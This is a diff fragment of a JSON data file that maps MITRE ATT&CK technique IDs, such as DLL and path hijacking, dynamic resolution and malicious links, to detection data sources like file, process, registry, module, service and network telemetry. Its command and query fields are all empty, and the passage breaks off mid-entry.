+ "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1574.007", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1574.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": 
"Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in 
the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1574", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + 
"definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + 
"macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + 
"collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software 
programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1568.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1204.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format 